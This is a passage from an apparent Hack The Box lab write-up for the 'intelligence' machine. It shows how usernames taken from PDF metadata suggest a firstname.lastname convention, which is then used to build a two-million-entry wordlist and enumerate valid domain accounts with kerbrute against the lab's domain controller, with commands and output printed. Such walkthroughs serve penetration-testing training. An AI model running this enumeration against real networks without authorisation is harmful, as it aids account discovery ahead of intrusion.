User Naming Convention
The 2 PDF files available from the target web server revealed 2 potential domain usernames in the Creator field of the metadata;
William.LeeJose.Williams
This suggests the naming convention that the target domain uses for other users; <FIRSTNAME>.<LASTNAME>
I will attempt to create a list of potential usernames, following the discovered naming convention to perform an additional brute-force attack to the target KDC
Wordlist
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 4
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Names file path: /usr/share/wordlists/seclists/Usernames/Names/names-usa-top2000.txt
Surnames file path: /usr/share/wordlists/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]: /home/kali/archive/htb/labs/intelligence/potential_usernames.txt
Output saved in /home/kali/archive/htb/labs/intelligence/potential_usernames.txtUsing a custom Python script, I generated a wordlist containing potential usernames; potential_usernames.txt
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ wc -l potential_usernames.txt
2000000 potential_usernames.txtIt contains 2 million arbitrary usernames. This would take too much time to go through
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ kerbrute userenum --dc dc.intelligence.htb -d INTELLIGENCE.HTB ./potential_usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 09/26/23 - Ronnie Flathers @ropnop
2023/09/26 15:29:16 > Using KDC(s):
2023/09/26 15:29:16 > dc.intelligence.htb:88
2023/09/26 15:31:13 > [+] VALID USERNAME: RICHARD.WILLIAMS@INTELLIGENCE.HTB
2023/09/26 15:31:14 > [+] VALID USERNAME: JOSE.WILLIAMS@INTELLIGENCE.HTB
2023/09/26 15:36:06 > [+] VALID USERNAME: DAVID.WILSON@INTELLIGENCE.HTB
2023/09/26 15:40:29 > [+] VALID USERNAME: JENNIFER.THOMAS@INTELLIGENCE.HTB
2023/09/26 15:42:58 > [+] VALID USERNAME: DARRYL.HARRIS@INTELLIGENCE.HTB
2023/09/26 15:51:40 > [+] VALID USERNAME: WILLIAM.LEE@INTELLIGENCE.HTB
2023/09/26 15:52:09 > [+] VALID USERNAME: LAURA.LEE@INTELLIGENCE.HTB
2023/09/26 15:53:37 > [+] VALID USERNAME: THOMAS.HALL@INTELLIGENCE.HTB
2023/09/26 15:56:02 > [+] VALID USERNAME: STEPHANIE.YOUNG@INTELLIGENCE.HTB
2023/09/26 15:58:28 > [+] VALID USERNAME: JASON.WRIGHT@INTELLIGENCE.HTB
2023/09/26 16:01:24 > [+] VALID USERNAME: SCOTT.SCOTT@INTELLIGENCE.HTB
2023/09/26 16:04:19 > [+] VALID USERNAME: BRIAN.BAKER@INTELLIGENCE.HTB
2023/09/26 16:10:41 > [+] VALID USERNAME: ANITA.ROBERTS@INTELLIGENCE.HTB
2023/09/26 16:15:03 > [+] VALID USERNAME: TRAVIS.EVANS@INTELLIGENCE.HTB
2023/09/26 16:19:52 > [+] VALID USERNAME: BRIAN.MORRIS@INTELLIGENCE.HTB
2023/09/26 16:21:49 > [+] VALID USERNAME: DAVID.REED@INTELLIGENCE.HTB
2023/09/26 16:28:19 > [+] VALID USERNAME: SAMUEL.RICHARDSON@INTELLIGENCE.HTB
2023/09/26 16:46:46 > [+] VALID USERNAME: JOHN.COLEMAN@INTELLIGENCE.HTB
2023/09/26 16:47:39 > [+] VALID USERNAME: JOHN.COLEMAN@INTELLIGENCE.HTB
2023/09/26 16:50:48 > [+] VALID USERNAME: KELLY.LONG@INTELLIGENCE.HTB
2023/09/26 16:51:12 > [+] VALID USERNAME: KELLY.LONG@INTELLIGENCE.HTB
2023/09/26 16:51:40 > [+] VALID USERNAME: JASON.PATTERSON@INTELLIGENCE.HTB
2023/09/26 17:33:17 > [+] VALID USERNAME: JOEL.CRAWFORD@INTELLIGENCE.HTB
2023/09/26 18:09:08 > [+] VALID USERNAME: DANNY.MATTHEWS@INTELLIGENCE.HTB
2023/09/26 18:17:01 > [+] VALID USERNAME: IAN.DUNCAN@INTELLIGENCE.HTB
^cI stopped the brute-force attack with kerbrute about an hour later as it reached only about 15% of the 2 million potential users Despite of early aborting, 23 valid domain users have been identified
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ cat dummy | cut -d '@' -f1 | cut -d ':' -f4 | tr -d [:blank:] | tr '[:upper:]' '[:lower:]' > users_from_naming_convention.txtThe raw output is saved to the dummy file to be sorted and saved to the users_from_naming_convention.txt file